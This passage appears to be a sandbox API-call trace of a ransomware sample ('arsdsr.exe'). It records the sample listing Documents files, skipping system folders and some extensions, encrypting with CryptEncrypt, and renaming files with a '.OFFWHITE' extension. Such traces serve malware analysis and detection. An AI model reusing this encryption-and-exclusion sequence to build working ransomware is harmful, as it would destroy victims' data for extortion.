lpMem=0x5487c0 | out: hHeap=0x500000) returned 1 [0132.799] GetProcessHeap () returned 0x500000 [0132.799] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5487a8 | out: hHeap=0x500000) returned 1 [0132.799] lstrcpyW (in: lpString1=0x295dcb8, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\2M0NVS5En5W\\VCmGgM.docx" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\2M0NVS5En5W\\VCmGgM.docx") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\2M0NVS5En5W\\VCmGgM.docx" [0132.799] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\2M0NVS5En5W\\VCmGgM.docx", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\2M0NVS5En5W\\VCmGgM.docx.OFFWHITE") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\2M0NVS5En5W\\VCmGgM.docx.OFFWHITE" [0132.800] MoveFileW (lpExistingFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\2M0NVS5En5W\\VCmGgM.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\2m0nvs5en5w\\vcmggm.docx"), lpNewFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\2M0NVS5En5W\\VCmGgM.docx.OFFWHITE" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\2m0nvs5en5w\\vcmggm.docx.offwhite")) returned 1 [0132.800] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb4c5dc90, ftCreationTime.dwHighDateTime=0x1d5df3e, ftLastAccessTime.dwLowDateTime=0xc3dada0, ftLastAccessTime.dwHighDateTime=0x1d5daa7, ftLastWriteTime.dwLowDateTime=0xc3dada0, ftLastWriteTime.dwHighDateTime=0x1d5daa7, nFileSizeHigh=0x0, nFileSizeLow=0xe5a1, dwReserved0=0x295debc, dwReserved1=0x3703c3be, cFileName="VCmGgM.docx", cAlternateFileName="VCMGGM~1.DOC")) returned 0 [0132.800] FindClose (in: hFindFile=0x544650 | out: hFindFile=0x544650) returned 1 [0132.801] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9f7eeb0, ftCreationTime.dwHighDateTime=0x1d5e3ef, ftLastAccessTime.dwLowDateTime=0x546aa840, ftLastAccessTime.dwHighDateTime=0x1d5df88, ftLastWriteTime.dwLowDateTime=0x546aa840, ftLastWriteTime.dwHighDateTime=0x1d5df88, nFileSizeHigh=0x0, nFileSizeLow=0x2a86, dwReserved0=0x440042, dwReserved1=0x295f070, cFileName="2UKzlZ9bQNK5koLl.ots", cAlternateFileName="2UKZLZ~1.OTS")) returned 1 [0132.801] lstrcmpiW (lpString1="2UKzlZ9bQNK5koLl.ots", lpString2=".") returned 1 [0132.801] lstrcmpiW (lpString1="2UKzlZ9bQNK5koLl.ots", lpString2="..") returned 1 [0132.801] lstrcmpiW (lpString1="2UKzlZ9bQNK5koLl.ots", lpString2="...") returned 1 [0132.801] lstrcmpiW (lpString1="2UKzlZ9bQNK5koLl.ots", lpString2="windows") returned -1 [0132.801] lstrcmpiW (lpString1="2UKzlZ9bQNK5koLl.ots", lpString2="$recycle.bin") returned 1 [0132.801] lstrcmpiW (lpString1="2UKzlZ9bQNK5koLl.ots", lpString2="rsa") returned -1 [0132.801] lstrcmpiW (lpString1="2UKzlZ9bQNK5koLl.ots", lpString2="ntuser.dat") returned -1 [0132.801] lstrcmpiW (lpString1="2UKzlZ9bQNK5koLl.ots", lpString2="programdata") returned -1 [0132.801] lstrcmpiW (lpString1="2UKzlZ9bQNK5koLl.ots", lpString2="appdata") returned -1 [0132.801] lstrcmpiW (lpString1="2UKzlZ9bQNK5koLl.ots", lpString2="program files") returned -1 [0132.801] lstrcmpiW (lpString1="2UKzlZ9bQNK5koLl.ots", lpString2="program files (x86)") returned -1 [0132.801] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" [0132.801] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpString2="2UKzlZ9bQNK5koLl.ots" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\2UKzlZ9bQNK5koLl.ots") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\2UKzlZ9bQNK5koLl.ots" [0132.801] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0132.801] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0132.801] PathFindExtensionW (pszPath="2UKzlZ9bQNK5koLl.ots") returned=".ots" [0132.801] lstrcmpiW (lpString1=".ots", lpString2=".exe") returned 1 [0132.801] lstrcmpiW (lpString1=".ots", lpString2=".log") returned 1 [0132.801] lstrcmpiW (lpString1=".ots", lpString2=".cab") returned 1 [0132.801] lstrcmpiW (lpString1=".ots", lpString2=".cmd") returned 1 [0132.801] lstrcmpiW (lpString1=".ots", lpString2=".com") returned 1 [0132.802] lstrcmpiW (lpString1=".ots", lpString2=".cpl") returned 1 [0132.802] lstrcmpiW (lpString1=".ots", lpString2=".ini") returned 1 [0132.802] lstrcmpiW (lpString1=".ots", lpString2=".dll") returned 1 [0132.802] lstrcmpiW (lpString1=".ots", lpString2=".url") returned -1 [0132.802] lstrcmpiW (lpString1=".ots", lpString2=".ttf") returned -1 [0132.802] lstrcmpiW (lpString1=".ots", lpString2=".mp3") returned 1 [0132.802] lstrcmpiW (lpString1=".ots", lpString2=".pif") returned -1 [0132.802] lstrcmpiW (lpString1=".ots", lpString2=".mp4") returned 1 [0132.802] lstrcmpiW (lpString1=".ots", lpString2=".OFFWHITE") returned 1 [0132.802] lstrcmpiW (lpString1=".ots", lpString2=".msi") returned 1 [0132.802] lstrcmpiW (lpString1="2UKzlZ9bQNK5koLl.ots", lpString2="OFFWHITE-MANUAL.txt") returned -1 [0132.802] GetProcessHeap () returned 0x500000 [0132.802] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x53f5d8 [0132.802] CreateFileW (lpFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\2UKzlZ9bQNK5koLl.ots" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\2ukzlz9bqnk5koll.ots"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb0 [0132.803] GetFileSizeEx (in: hFile=0xb0, lpFileSize=0x295e560 | out: lpFileSize=0x295e560*=10886) returned 1 [0132.803] GetProcessHeap () returned 0x500000 [0132.803] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5487a8 [0132.803] GetProcessHeap () returned 0x500000 [0132.803] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5487c0 [0132.803] GetProcessHeap () returned 0x500000 [0132.804] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5242b0 [0132.804] GetProcessHeap () returned 0x500000 [0132.804] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5243b8 [0132.804] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0132.804] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0132.804] SystemFunction036 (in: RandomBuffer=0x5487a8, RandomBufferLength=0x10 | out: RandomBuffer=0x5487a8) returned 1 [0132.804] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0132.804] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0132.804] SystemFunction036 (in: RandomBuffer=0x5487c0, RandomBufferLength=0x10 | out: RandomBuffer=0x5487c0) returned 1 [0132.804] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0132.804] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0132.804] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5242b0*, pdwDataLen=0x295e310*=0x10, dwBufLen=0x100 | out: pbData=0x5242b0*, pdwDataLen=0x295e310*=0x100) returned 1 [0132.804] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0132.804] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0132.804] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5243b8*, pdwDataLen=0x295e30c*=0x10, dwBufLen=0x100 | out: pbData=0x5243b8*, pdwDataLen=0x295e30c*=0x100) returned 1 [0132.805] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x2a86, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.805] SetLastError (dwErrCode=0x0) [0132.805] WriteFile (in: hFile=0xb0, lpBuffer=0x5242b0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x5242b0*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0132.807] GetLastError () returned 0x0 [0132.807] GetLastError () returned 0x0 [0132.807] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x2b86, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.807] WriteFile (in: hFile=0xb0, lpBuffer=0x5243b8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x5243b8*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0132.807] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x2c86, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.807] WriteFile (in: hFile=0xb0, lpBuffer=0x53f5d8*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x53f5d8*, lpNumberOfBytesWritten=0x295e54c*=0x8, lpOverlapped=0x0) returned 1 [0132.807] GetProcessHeap () returned 0x500000 [0132.807] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x2a86) returned 0x55a7b8 [0132.807] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.807] ReadFile (in: hFile=0xb0, lpBuffer=0x55a7b8, nNumberOfBytesToRead=0x2a86, lpNumberOfBytesRead=0x295e540, lpOverlapped=0x0 | out: lpBuffer=0x55a7b8*, lpNumberOfBytesRead=0x295e540*=0x2a86, lpOverlapped=0x0) returned 1 [0132.809] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.809] WriteFile (in: hFile=0xb0, lpBuffer=0x55a7b8*, nNumberOfBytesToWrite=0x2a86, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x55a7b8*, lpNumberOfBytesWritten=0x295e54c*=0x2a86, lpOverlapped=0x0) returned 1 [0132.809] GetProcessHeap () returned 0x500000 [0132.809] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x55a7b8 | out: hHeap=0x500000) returned 1 [0132.809] CloseHandle (hObject=0xb0) returned 1 [0132.827] GetProcessHeap () returned 0x500000 [0132.827] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5242b0 | out: hHeap=0x500000) returned 1 [0132.828] GetProcessHeap () returned 0x500000 [0132.828] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5243b8 | out: hHeap=0x500000) returned 1 [0132.828] GetProcessHeap () returned 0x500000 [0132.828] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5487a8 | out: hHeap=0x500000) returned 1 [0132.828] GetProcessHeap () returned 0x500000 [0132.828] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5487c0 | out: hHeap=0x500000) returned 1 [0132.828] lstrcpyW (in: lpString1=0x295e338, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\2UKzlZ9bQNK5koLl.ots" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\2UKzlZ9bQNK5koLl.ots") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\2UKzlZ9bQNK5koLl.ots" [0132.828] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\2UKzlZ9bQNK5koLl.ots", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\2UKzlZ9bQNK5koLl.ots.OFFWHITE") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\2UKzlZ9bQNK5koLl.ots.OFFWHITE" [0132.828] MoveFileW (lpExistingFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\2UKzlZ9bQNK5koLl.ots" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\2ukzlz9bqnk5koll.ots"), lpNewFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\2UKzlZ9bQNK5koLl.ots.OFFWHITE" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\2ukzlz9bqnk5koll.ots.offwhite")) returned 1 [0132.829] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb116bb00, ftCreationTime.dwHighDateTime=0x1d59b55, ftLastAccessTime.dwLowDateTime=0x3e3dd2d0, ftLastAccessTime.dwHighDateTime=0x1d57373, ftLastWriteTime.dwLowDateTime=0x3e3dd2d0, ftLastWriteTime.dwHighDateTime=0x1d57373, nFileSizeHigh=0x0, nFileSizeLow=0x4756, dwReserved0=0x440042, dwReserved1=0x295f070, cFileName="6Us_sQry_.xlsx", cAlternateFileName="6US_SQ~1.XLS")) returned 1 [0132.829] lstrcmpiW (lpString1="6Us_sQry_.xlsx", lpString2=".") returned 1 [0132.829] lstrcmpiW (lpString1="6Us_sQry_.xlsx", lpString2="..") returned 1 [0132.829] lstrcmpiW (lpString1="6Us_sQry_.xlsx", lpString2="...") returned 1 [0132.829] lstrcmpiW (lpString1="6Us_sQry_.xlsx", lpString2="windows") returned -1 [0132.829] lstrcmpiW (lpString1="6Us_sQry_.xlsx", lpString2="$recycle.bin") returned 1 [0132.829] lstrcmpiW (lpString1="6Us_sQry_.xlsx", lpString2="rsa") returned -1 [0132.829] lstrcmpiW (lpString1="6Us_sQry_.xlsx", lpString2="ntuser.dat") returned -1 [0132.829] lstrcmpiW (lpString1="6Us_sQry_.xlsx", lpString2="programdata") returned -1 [0132.829] lstrcmpiW (lpString1="6Us_sQry_.xlsx", lpString2="appdata") returned -1 [0132.829] lstrcmpiW (lpString1="6Us_sQry_.xlsx", lpString2="program files") returned -1 [0132.829] lstrcmpiW (lpString1="6Us_sQry_.xlsx", lpString2="program files (x86)") returned -1 [0132.829] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" [0132.829] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpString2="6Us_sQry_.xlsx" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\6Us_sQry_.xlsx") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\6Us_sQry_.xlsx" [0132.829] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0132.829] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0132.829] PathFindExtensionW (pszPath="6Us_sQry_.xlsx") returned=".xlsx" [0132.830] lstrcmpiW (lpString1=".xlsx", lpString2=".exe") returned 1 [0132.830] lstrcmpiW (lpString1=".xlsx", lpString2=".log") returned 1 [0132.830] lstrcmpiW (lpString1=".xlsx", lpString2=".cab") returned 1 [0132.830] lstrcmpiW (lpString1=".xlsx", lpString2=".cmd") returned 1 [0132.830] lstrcmpiW (lpString1=".xlsx", lpString2=".com") returned 1 [0132.830] lstrcmpiW (lpString1=".xlsx", lpString2=".cpl") returned 1 [0132.830] lstrcmpiW (lpString1=".xlsx", lpString2=".ini") returned 1 [0132.830] lstrcmpiW (lpString1=".xlsx", lpString2=".dll") returned 1 [0132.830] lstrcmpiW (lpString1=".xlsx", lpString2=".url") returned 1 [0132.830] lstrcmpiW (lpString1=".xlsx", lpString2=".ttf") returned 1 [0132.830] lstrcmpiW (lpString1=".xlsx", lpString2=".mp3") returned 1 [0132.830] lstrcmpiW (lpString1=".xlsx", lpString2=".pif") returned 1 [0132.830] lstrcmpiW (lpString1=".xlsx", lpString2=".mp4") returned 1 [0132.830] lstrcmpiW (lpString1=".xlsx", lpString2=".OFFWHITE") returned 1 [0132.830] lstrcmpiW (lpString1=".xlsx", lpString2=".msi") returned 1 [0132.830] lstrcmpiW (lpString1="6Us_sQry_.xlsx", lpString2="OFFWHITE-MANUAL.txt") returned -1 [0132.830] GetProcessHeap () returned 0x500000 [0132.830] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x53f5e8 [0132.830] CreateFileW (lpFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\6Us_sQry_.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\6us_sqry_.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb0 [0132.831] GetFileSizeEx (in: hFile=0xb0, lpFileSize=0x295e560 | out: lpFileSize=0x295e560*=18262) returned 1 [0132.831] GetProcessHeap () returned 0x500000 [0132.831] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5487c0 [0132.831] GetProcessHeap () returned 0x500000 [0132.831] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5487a8 [0132.831] GetProcessHeap () returned 0x500000 [0132.831] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5243b8 [0132.831] GetProcessHeap () returned 0x500000 [0132.831] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5242b0 [0132.831] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0132.831] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0132.831] SystemFunction036 (in: RandomBuffer=0x5487c0, RandomBufferLength=0x10 | out: RandomBuffer=0x5487c0) returned 1 [0132.831] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0132.831] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0132.831] SystemFunction036 (in: RandomBuffer=0x5487a8, RandomBufferLength=0x10 | out: RandomBuffer=0x5487a8) returned 1 [0132.831] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0132.831] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0132.831] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5243b8*, pdwDataLen=0x295e310*=0x10, dwBufLen=0x100 | out: pbData=0x5243b8*, pdwDataLen=0x295e310*=0x100) returned 1 [0132.832] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0132.832] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0132.832] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5242b0*, pdwDataLen=0x295e30c*=0x10, dwBufLen=0x100 | out: pbData=0x5242b0*, pdwDataLen=0x295e30c*=0x100) returned 1 [0132.832] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x4756, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.832] SetLastError (dwErrCode=0x0) [0132.832] WriteFile (in: hFile=0xb0, lpBuffer=0x5243b8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x5243b8*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0132.836] GetLastError () returned 0x0 [0132.836] GetLastError () returned 0x0 [0132.836] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x4856, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.836] WriteFile (in: hFile=0xb0, lpBuffer=0x5242b0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x5242b0*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0132.836] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x4956, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.836] WriteFile (in: hFile=0xb0, lpBuffer=0x53f5e8*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x53f5e8*, lpNumberOfBytesWritten=0x295e54c*=0x8, lpOverlapped=0x0) returned 1 [0132.836] GetProcessHeap () returned 0x500000 [0132.836] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x4756) returned 0x55a7b8 [0132.836] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.836] ReadFile (in: hFile=0xb0, lpBuffer=0x55a7b8, nNumberOfBytesToRead=0x4756, lpNumberOfBytesRead=0x295e540, lpOverlapped=0x0 | out: lpBuffer=0x55a7b8*, lpNumberOfBytesRead=0x295e540*=0x4756, lpOverlapped=0x0) returned 1 [0132.839] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.839] WriteFile (in: hFile=0xb0, lpBuffer=0x55a7b8*, nNumberOfBytesToWrite=0x4756, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x55a7b8*, lpNumberOfBytesWritten=0x295e54c*=0x4756, lpOverlapped=0x0) returned 1 [0132.839] GetProcessHeap () returned 0x500000 [0132.839] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x55a7b8 | out: hHeap=0x500000) returned 1 [0132.839] CloseHandle (hObject=0xb0) returned 1 [0132.844] GetProcessHeap () returned 0x500000 [0132.844] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5243b8 | out: hHeap=0x500000) returned 1 [0132.845] GetProcessHeap () returned 0x500000 [0132.845] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5242b0 | out: hHeap=0x500000) returned 1 [0132.845] GetProcessHeap () returned 0x500000 [0132.845] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5487c0 | out: hHeap=0x500000) returned 1 [0132.845] GetProcessHeap () returned 0x500000 [0132.845] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5487a8 | out: hHeap=0x500000) returned 1 [0132.845] lstrcpyW (in: lpString1=0x295e338, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\6Us_sQry_.xlsx" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\6Us_sQry_.xlsx") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\6Us_sQry_.xlsx" [0132.845] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\6Us_sQry_.xlsx", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\6Us_sQry_.xlsx.OFFWHITE") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\6Us_sQry_.xlsx.OFFWHITE" [0132.845] MoveFileW (lpExistingFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\6Us_sQry_.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\6us_sqry_.xlsx"), lpNewFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\6Us_sQry_.xlsx.OFFWHITE" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\6us_sqry_.xlsx.offwhite")) returned 1 [0132.846] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf602dfc0, ftCreationTime.dwHighDateTime=0x1d5dcc1, ftLastAccessTime.dwLowDateTime=0x25d92060, ftLastAccessTime.dwHighDateTime=0x1d5e479, ftLastWriteTime.dwLowDateTime=0x25d92060, ftLastWriteTime.dwHighDateTime=0x1d5e479, nFileSizeHigh=0x0, nFileSizeLow=0x1361e, dwReserved0=0x440042, dwReserved1=0x295f070, cFileName="aeBzMg.xlsx", cAlternateFileName="AEBZMG~1.XLS")) returned 1 [0132.846] lstrcmpiW (lpString1="aeBzMg.xlsx", lpString2=".") returned 1 [0132.846] lstrcmpiW (lpString1="aeBzMg.xlsx", lpString2="..") returned 1 [0132.846] lstrcmpiW (lpString1="aeBzMg.xlsx", lpString2="...") returned 1 [0132.846] lstrcmpiW (lpString1="aeBzMg.xlsx", lpString2="windows") returned -1 [0132.846] lstrcmpiW (lpString1="aeBzMg.xlsx", lpString2="$recycle.bin") returned 1 [0132.846] lstrcmpiW (lpString1="aeBzMg.xlsx", lpString2="rsa") returned -1 [0132.846] lstrcmpiW (lpString1="aeBzMg.xlsx", lpString2="ntuser.dat") returned -1 [0132.846] lstrcmpiW (lpString1="aeBzMg.xlsx", lpString2="programdata") returned -1 [0132.846] lstrcmpiW (lpString1="aeBzMg.xlsx", lpString2="appdata") returned -1 [0132.846] lstrcmpiW (lpString1="aeBzMg.xlsx", lpString2="program files") returned -1 [0132.846] lstrcmpiW (lpString1="aeBzMg.xlsx", lpString2="program files (x86)") returned -1 [0132.846] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" [0132.846] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpString2="aeBzMg.xlsx" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\aeBzMg.xlsx") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\aeBzMg.xlsx" [0132.846] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0132.846] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0132.846] PathFindExtensionW (pszPath="aeBzMg.xlsx") returned=".xlsx" [0132.846] lstrcmpiW (lpString1=".xlsx", lpString2=".exe") returned 1 [0132.846] lstrcmpiW (lpString1=".xlsx", lpString2=".log") returned 1 [0132.846] lstrcmpiW (lpString1=".xlsx", lpString2=".cab") returned 1 [0132.847] lstrcmpiW (lpString1=".xlsx", lpString2=".cmd") returned 1 [0132.847] lstrcmpiW (lpString1=".xlsx", lpString2=".com") returned 1 [0132.847] lstrcmpiW (lpString1=".xlsx", lpString2=".cpl") returned 1 [0132.847] lstrcmpiW (lpString1=".xlsx", lpString2=".ini") returned 1 [0132.847] lstrcmpiW (lpString1=".xlsx", lpString2=".dll") returned 1 [0132.847] lstrcmpiW (lpString1=".xlsx", lpString2=".url") returned 1 [0132.847] lstrcmpiW (lpString1=".xlsx", lpString2=".ttf") returned 1 [0132.847] lstrcmpiW (lpString1=".xlsx", lpString2=".mp3") returned 1 [0132.847] lstrcmpiW (lpString1=".xlsx", lpString2=".pif") returned 1 [0132.847] lstrcmpiW (lpString1=".xlsx", lpString2=".mp4") returned 1 [0132.847] lstrcmpiW (lpString1=".xlsx", lpString2=".OFFWHITE") returned 1 [0132.847] lstrcmpiW (lpString1=".xlsx", lpString2=".msi") returned 1 [0132.847] 